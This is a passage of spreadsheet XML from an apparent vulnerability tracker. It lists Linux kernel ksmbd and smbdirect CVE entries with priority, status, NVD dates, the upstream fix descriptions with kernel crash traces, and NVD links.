batch succeeds, eliminating the race window.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90162</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90163</t>
        </is>
      </c>
      <c r="D531" s="5" t="inlineStr"/>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="inlineStr"/>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr"/>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: call ksmbd_proc_cleanup() on module init failure
When a later initializer fails, the unwind chain releases resources
created after procfs and then jumps directly to class_unregister().
Returning an error from module_init() leaves the proc tree and its
per-CPU counters allocated.</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90163</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90164</t>
        </is>
      </c>
      <c r="D532" s="5" t="inlineStr"/>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="inlineStr"/>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr"/>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: abort initialization when proc setup fails
ksmbd_server_init() calls ksmbd_proc_init() before creating the
remaining proc entries and server subsystems. ksmbd_proc_init() tears
down partial state on a procfs or percpu_counter allocation failure,
but returns void, so ksmbd_server_init() continues as if the counters
were usable.
Once userspace starts the server, server_ctrl_handle_init() calls
ksmbd_proc_reset(), which reaches percpu_counter_set() with a NULL
per-CPU counters pointer on SMP systems. The later ksmbd_proc_create()
calls also receive a NULL parent and may create entries in the /proc
root; ksmbd_proc_cleanup() cannot remove those entries because
ksmbd_proc_fs is NULL.</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90164</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90165</t>
        </is>
      </c>
      <c r="D533" s="5" t="inlineStr"/>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="inlineStr"/>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr"/>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix invalid pointer dereference in ksmbd_stop_durable_scavenger()
See the procedure below:
  ksmbd_launch_ksmbd_durable_scavenger
    durable_scavenger_running = true
    server_conf.dh_task = kthread_run() // fail, dh_task is an ERR_PTR()
  server_ctrl_handle_reset
    ksmbd_stop_durable_scavenger
    kthread_stop(server_conf.dh_task) // invalid pointer</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90165</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90166</t>
        </is>
      </c>
      <c r="D534" s="5" t="inlineStr"/>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="inlineStr"/>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr"/>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix null-ptr-deref in ksmbd_ipc_tree_connect_request()
See the procedure below:
  ksmbd_tree_conn_connect
    ksmbd_share_config_get
      share-&gt;name = kstrdup() // fail
      if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) // false
      // do not check `share-&gt;name`
    ksmbd_ipc_tree_connect_request
      strlen(share-&gt;name) // null-ptr-deref</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90166</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90167</t>
        </is>
      </c>
      <c r="D535" s="5" t="inlineStr"/>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="inlineStr"/>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr"/>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: serialize oplock close with pending break ownership
close may abort an in-flight oplock break while another breaker already
holds an opinfo reference. Releasing pending_break wakes that waiter, but
without serializing the close transition with bit acquisition it can become
a new break owner through the test_and_set_bit() fast path. It can then
overwrite OPLOCK_CLOSING with OPLOCK_ACK_WAIT and continue a break for
a dying opinfo.
Make OPLOCK_CLOSING terminal once the opinfo is removed from the inode
list. Serialize that transition, pending_break acquisition, and
OPLOCK_ACK_WAIT setup with an opinfo state lock. A breaker which loses
the race releases its ownership and returns -ENOENT. Explicitly wake
pending_break waiters during close so they can observe the terminal state.
Also prevent ACK and timeout paths from replacing OPLOCK_CLOSING with
OPLOCK_STATE_NONE.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90167</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90168</t>
        </is>
      </c>
      <c r="D536" s="5" t="inlineStr"/>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="inlineStr"/>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr"/>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: retain connection for pending notify work
Deferred CHANGE_NOTIFY work keeps an async message ID after the original
request work is released. A durable handle can outlive its connection, so
the connection teardown can destroy its async IDA before the handle close
releases the pending notify work.
Give the synthetic deferred work a connection reference. Release it after
the async ID in ksmbd_free_work_struct(). This keeps the async IDA alive
until the deferred work is released, even when the original connection has
already left the connection list.
During server shutdown there is no client to receive a cleanup response.
Skip the write and only release the pending work.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90168</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90169</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2026-09-17</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr"/>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: free preauth sessions on connection teardown
SMB3.1.1 multichannel binding preserves the preauthentication hash in a
preauth_session between the NTLM negotiate and authenticate requests.
The binding NTLM negotiate allocates this object and returns
STATUS_MORE_PROCESSING_REQUIRED. If the client disconnects before it sends
the authenticate request, neither the authenticate nor error cleanup paths
free the object.
Release any remaining preauthentication sessions when tearing down the
connection. Initialize the list when allocating the connection so that this
cleanup is safe regardless of the negotiated dialect.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90169</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90170</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2026-09-17</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr"/>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: validate ipc response length before dereferencing its fields
ipc_validate_msg() computes the expected message size by reading length
fields out of the response buffer supplied by the userspace ksmbd daemon
(payload_sz, session_key_len, ngroups, ...).  Those fields are read before
the buffer is verified to be large enough to contain the struct they belong
to, so a short response makes the read land past the end of the allocation.
handle_response() sizes entry-&gt;response purely from the netlink attribute
length (nla_len()) and only guards the leading handle read, so the daemon
can install a response as small as the kmalloc-8 object seen below.  When
ipc_msg_send_request() then calls ipc_validate_msg() for a
KSMBD_EVENT_RPC_REQUEST, the cast to struct ksmbd_rpc_command reads
resp-&gt;payload_sz at offset 8 of an 8-byte allocation:
[ 3697.841381] ==================================================================
[ 3697.844099] BUG: KASAN: slab-out-of-bounds in ipc_msg_send_request+0x763/0x800
[ 3697.846604] Read of size 4 at addr ffff888105f95910 by task kworker/4:3/20682
[ 3697.849061]
[ 3697.849801] CPU: 4 UID: 0 PID: 20682 Comm: kworker/4:3 Not tainted 7.2.0-rc3-next-20260717-virtme #117 PREEMPT(lazy)
[ 3697.850077] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 3697.850303] Workqueue: ksmbd-io handle_ksmbd_work
[ 3697.850592] Call Trace:
[ 3697.850794]  &lt;TASK&gt;
[ 3697.850952]  __dump_stack+0x21/0x60
[ 3697.851239]  dump_stack_lvl+0xc2/0x100
[ 3697.851528]  print_address_description+0x77/0x200
[ 3697.851816]  ? ipc_msg_send_request+0x763/0x800
[ 3697.852024]  print_report+0x58/0x70
[ 3697.852316]  kasan_report+0x117/0x150
[ 3697.852585]  ? down_write+0x146/0x1f0
[ 3697.852809]  ? ipc_msg_send_request+0x763/0x800
[ 3697.853082]  ipc_msg_send_request+0x763/0x800
[ 3697.853385]  ? __pfx_ipc_msg_send_request+0x10/0x10
[ 3697.853604]  ? kasan_unpoison+0x48/0x70
[ 3697.853936]  ? __pfx___up_read+0x10/0x10
[ 3697.854221]  ksmbd_rpc_ioctl+0x380/0x520
[ 3697.854542]  ? __pfx_ksmbd_rpc_ioctl+0x10/0x10
[ 3697.854757]  ? kasan_unpoison+0x48/0x70
[ 3697.854962]  ? copy_from_kernel_nofault+0x32c/0x4e0
[ 3697.855166]  ? kasan_unpoison+0x48/0x70
[ 3697.855416]  fsctl_pipe_transceive+0x139/0x7a0
[ 3697.855705]  ? __pfx_copy_from_kernel_nofault+0x10/0x10
[ 3697.855937]  ? __pfx_fsctl_pipe_transceive+0x10/0x10
[ 3697.856388]  ? __sanitizer_cov_trace_switch+0x7b/0x140
[ 3697.856620]  smb2_ioctl+0x1141/0x3420
[ 3697.856994]  ? __pfx_smb2_ioctl+0x10/0x10
[ 3697.857182]  ? get_smb2_cmd_val+0xe3/0x1c0
[ 3697.857655]  handle_ksmbd_work+0x9ad/0x15e0
[ 3697.858034]  ? __pfx_handle_ksmbd_work+0x10/0x10
[ 3697.858251]  ? lock_release+0xf7/0x360
[ 3697.858466]  ? process_scheduled_works+0x954/0x1600
[ 3697.858698]  ? process_scheduled_works+0x954/0x1600
[ 3697.858905]  process_scheduled_works+0xc22/0x1600
[ 3697.859368]  ? __pfx_process_scheduled_works+0x10/0x10
[ 3697.859637]  ? __pfx_assign_work+0x10/0x10
[ 3697.859896]  ? lock_is_held_type+0x7b/0x110
[ 3697.860146]  worker_thread+0x975/0xee0
[ 3697.860524]  ? __pfx_do_raw_spin_lock+0x10/0x10
[ 3697.860830]  ? __kthread_parkme+0x21e/0x260
[ 3697.861105]  kthread+0x3a6/0x490
[ 3697.861423]  ? __pfx_worker_thread+0x10/0x10
[ 3697.861643]  ? __pfx_kthread+0x10/0x10
[ 3697.861878]  ret_from_fork+0x55a/0xa20
[ 3697.862194]  ? __pfx_ret_from_fork+0x10/0x10
[ 3697.862480]  ? __pfx_kthread+0x10/0x10
[ 3697.862714]  ret_from_fork_asm+0x1a/0x30
[ 3697.862965]  &lt;/TASK&gt;
[ 3697.863039]
[ 3697.938882] Allocated by task 20761:
[ 3697.940257]  kasan_save_track+0x3e/0x80
[ 3697.941782]  __kasan_kmalloc+0x72/0x90
[ 3697.943228]  __kvmalloc_node_noprof+0x3e9/0x6a0
[ 3697.944948]  handle_generic_event+0x59b/0x750
[ 3697.946592]  genl_family_rcv_msg_doit+0x3d6/0x560
[ 3697.946977]  genl_rcv_msg+0x67c/0x900
[ 3697.947224]  netlink_rcv_skb+0x286/0x580
[ 3697.947488]  genl_rcv+0x2d/0x80
[ 3
---truncated---</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90170</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90171</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2026-09-17</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr"/>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: smbdirect: release pending child sockets outside the handler lock
smbdirect_socket_destroy() releases the listener's pending/ready child
sockets while still holding the listener's handler lock, the
&amp;id_priv-&gt;handler_mutex taken via rdma_lock_handler(), not
sc-&gt;listen.lock, and before the listener's own rdma_destroy_id().
That ordering has one real consequence and one cosmetic one.
The real one: smbdirect_socket_release() drops the child's last
reference, which destroys the child's cm_id.  Doing that before the
listener's rdma_destroy_id() lets _cma_cancel_listens(), running from
the listener's _destroy_id(), walk an already freed child id_priv,
which KASAN catches as a slab-use-after-free during listener shutdown:
[ 4758.909130] BUG: KASAN: slab-use-after-free in __mutex_lock+0x1469/0x1560
[ 4758.911450] Read of size 1 at addr ffff88821c381db4 by task ksmbd.control/1652
[ 4758.913262] Call Trace:
[ 4758.913267]  &lt;TASK&gt;
[ 4758.913299]  __mutex_lock+0x1469/0x1560
[ 4758.913408]  _cma_cancel_listens+0x312/0x3b0
[ 4758.913413]  _destroy_id+0x363/0xee0
[ 4758.913417]  smbdirect_socket_destroy_sync+0x17d5/0x2440
[ 4758.913443]  smbdirect_socket_release+0x124/0x230
[ 4758.913451]  ksmbd_rdma_stop_listening+0x9f/0x190
[ 4758.913457]  ksmbd_conn_transport_destroy+0x65/0x3c0
[ 4758.913463]  kill_server_store+0x1fb/0x2b0
[ 4758.913501]  kernfs_fop_write_iter+0x349/0x4d0
[ 4758.913507]  vfs_write+0x5e7/0xc70
[ 4758.913528]  ksys_write+0x12a/0x210
[ 4758.913541]  do_syscall_64+0x135/0x460
[ 4758.913555]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
The cosmetic one: releasing a child recurses into
smbdirect_socket_destroy(), which takes the child's own
rdma_lock_handler() lock nested under the listener's.  The listener's
and the child's cm_id are always different instances, so this cannot
deadlock for real; the CM core itself nests a new connection id's
handler_mutex under the listening id's in cma_ib_req_handler().  But
lockdep only sees one lock class, reports possible recursive locking,
and then disables itself, hiding real locking bugs for the rest of the
run:
[ 2424.579653] WARNING: possible recursive locking detected
[ 2424.581180] 7.1.0-next-20260623+ #89 Not tainted
[ 2424.582548] --------------------------------------------
[ 2424.584500] ksmbd.control/8854 is trying to acquire lock:
[ 2424.586817] ffff888102303c20 (&amp;id_priv-&gt;handler_mutex){+.+.}-{4:4}, at: smbdirect_socket_destroy_sync+0xc39/0x2440
[ 2424.590590]
[ 2424.590590] but task is already holding lock:
[ 2424.591601] ffff888102046c20 (&amp;id_priv-&gt;handler_mutex){+.+.}-{4:4}, at: smbdirect_socket_destroy_sync+0xc39/0x2440
[ 2424.594178]
[ 2424.594178] other info that might help us debug this:
[ 2424.596634]  Possible unsafe locking scenario:
[ 2424.596634]
[ 2424.598841]        CPU0
[ 2424.599765]        ----
[ 2424.600695]   lock(&amp;id_priv-&gt;handler_mutex);
[ 2424.601836]   lock(&amp;id_priv-&gt;handler_mutex);
[ 2424.602590]
[ 2424.602590]  *** DEADLOCK ***
[ 2424.602590]
[ 2424.604512]  May be due to missing lock nesting notation
Splice the pending/ready children onto a local list under the
listener's listen.lock, while the handler lock is held so a concurrent
CM CONNECT_REQUEST cannot add more, but defer the actual
smbdirect_socket_release() calls until after the listener's cm_id has
been destroyed and its handler lock dropped.  The children are
independent sockets whose teardown needs neither the listener's
handler lock nor its cm_id.
Found with ksmbdzzer [2], a KSMBD fuzzer that drives libFuzzer with a
kcov-dataflow [1] coverage vector: it folds each instrumented
comparison/argument's runtime operand value together with its PC (the
default arm mixes them as pc⊕val) so that a new operand value at a known
site counts as new coverage.
[1] https://lwn.net/Articles/1077606/
[2] https://github.com/yskzalloc/kcov-dataflow</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90171</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90172</t>
        </is>
      </c>
      <c r="D540" s="5" t="inlineStr"/>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="inlineStr"/>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr"/>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: smbdirect: destroy QP before mem pools on accept failure
On the rdma_accept_failed error path of
smbdirect_accept_connect_request(), the receive io posted just above is
owned by the QP (recv_io is set to NULL after a successful post).  The
error path fell through to smbdirect_connection_destroy_mem_pools()
before smbdirect_connection_destroy_qp(), so the mem pools and the
recv_io slab cache were destroyed while that recv_io was still
outstanding on the QP.
The drain in smbdirect_connection_destroy_qp() (ib_drain_qp()) is what
runs the recv completion that returns the recv_io to the free list, so
destroying the pools first leaves the object outstanding at
kmem_cache_destroy() time ("Slab cache still has objects") and later
frees it into an already-destroyed mempool (mempool_free_bulk
NULL-pointer dereference).
Give rdma_accept_failed its own teardown that drains the QP first, then
destroys the mem pools, and returns.  The remaining labels
(post_recv_io_failed onward) run before the recv_io was ever posted, so
they keep the mem-pools-then-qp order.
The outstanding recv_io at kmem_cache_destroy() time:
[ 3487.344647] =============================================================================
[ 3487.349942] BUG smbdirect_recv_io_cache_ffff88811ba99000 (Not tainted): Objects remaining on __kmem_cache_shutdown()
[ 3487.356078] -----------------------------------------------------------------------------
[ 3487.356078]
[ 3487.356738] Object 0xffff8881511c3440 @offset=13376
[ 3487.358464] Allocated in mempool_alloc_noprof+0x18c/0x290 age=1194 cpu=6 pid=22254
[ 3487.361197]  mempool_alloc_noprof+0x18c/0x290
[ 3487.361542]  smbdirect_connection_create_mem_pools+0x405/0x780
[ 3487.361972]  smbdirect_accept_connect_request+0x5a8/0x1b80
[ 3487.362359]  smbdirect_listen_rdma_event_handler+0x1579/0x1b90
[ 3487.362779]  cma_cm_event_handler+0x9c/0x230
[ 3487.363096]  cma_ib_req_handler+0x2682/0x45d0
[ 3487.363414]  cm_process_work+0x56/0x3d0
[ 3487.363676]  cm_work_handler+0x8a0e/0xd000
[ 3487.367496]  process_scheduled_works+0xa07/0x13a0
[ 3487.367859]  worker_thread+0x7c9/0xc80
[ 3487.368148]  kthread+0x341/0x430
[ 3487.368407]  ret_from_fork+0x3a8/0x7a0
[ 3487.368704]  ret_from_fork_asm+0x1a/0x30
[ 3487.370307] Slab 0xffffea0005447000 objects=19 used=1 fp=0xffff8881511c0040 flags=0x100000000000240(workingset|head|node=0|zone=2)
[ 3487.372840] ------------[ cut here ]------------
[ 3487.373195] WARNING: mm/slub.c:1244 at __slab_err+0x1a/0x30, CPU#6: kworker/6:84/22254
[ 3487.373759] Modules linked in:
[ 3487.373993] CPU: 6 UID: 0 PID: 22254 Comm: kworker/6:84 Tainted: G    B               7.1.0-next-20260623+ #88 PREEMPT(lazy)
[ 3487.374778] Tainted: [B]=BAD_PAGE
[ 3487.377830] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
[ 3487.378515] Workqueue: ib_cm cm_work_handler
[ 3487.378820] RIP: 0010:__slab_err+0x1a/0x30
[ 3487.379129] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 e8 36 00 00 00 bf 05 00 00 00 be 01 00 00 00 e8 f7 75 45 00 90 &lt;0f&gt; 0b 90 c3 cc cc cc cc cc 66 66 66 66 2e 0f 1f 84 00 00 00 00 00
[ 3487.383255] RSP: 0018:ffff888220fc7050 EFLAGS: 00010093
[ 3487.383643] RAX: ffffffff8168e60a RBX: ffff88810955e640 RCX: ffff88821c381d80
[ 3487.384158] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffffff870fa080
[ 3487.384662] RBP: ffff888220fc7068 R08: ffffffff870fa087 R09: 1ffffffff0e1f410
[ 3487.385192] R10: dffffc0000000000 R11: fffffbfff0e1f411 R12: ffffea0005447210
[ 3487.385674] R13: ffffea0005447000 R14: ffff888220fc7068 R15: ffff88812a8ab300
[ 3487.388932] FS:  0000000000000000(0000) GS:ffff888427e76000(0000) knlGS:0000000000000000
[ 3487.389529] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3487.389934] CR2: 00007ffcf2d84fd8 CR3: 0000000111d64006 CR4: 0000000000f72ef0
[ 3487.390440] PKRU: 55555554
[ 3487.390641] Call Trace:
[ 3487.390826]  &lt;TASK&gt;
[ 3
---truncated---</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90172</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90173</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2026-09-17</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr"/>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: smbdirect: free completion queues with ib_free_cq()
smbdirect_connection_destroy_qp() creates the send and receive completion
queues with ib_alloc_cq_any(), which for IB_POLL_WORKQUEUE arms an
internal completion handler that runs ib_cq_poll_work() on a workqueue.
Tearing those CQs down with ib_destroy_cq() frees them without first
cancelling that poll work.
If the provider posts a completion late -- for example Soft-RoCE (rxe)
posting an RNR error from rxe_receiver() after rdma_destroy_qp() -- the
handler re-queues ib_cq_poll_work() on the already-freed CQ, and a
follow-on access faults in rxe_req_notify_cq().
Use ib_free_cq(), which cancel_work_sync()es the poll work before freeing
the CQ, so no completion handler can run against a freed queue.
[ 1236.599526] ==================================================================
[ 1236.602142] BUG: KASAN: slab-use-after-free in ib_cq_poll_work+0xd0/0x1a0
[ 1236.605524] Read of size 8 at addr ffff888111865800 by task kworker/4:1H/82
[ 1236.609017]
[ 1236.609270] CPU: 4 UID: 0 PID: 82 Comm: kworker/4:1H Not tainted 7.2.0-rc3-next-20260717-virtme #110 PREEMPT(lazy)
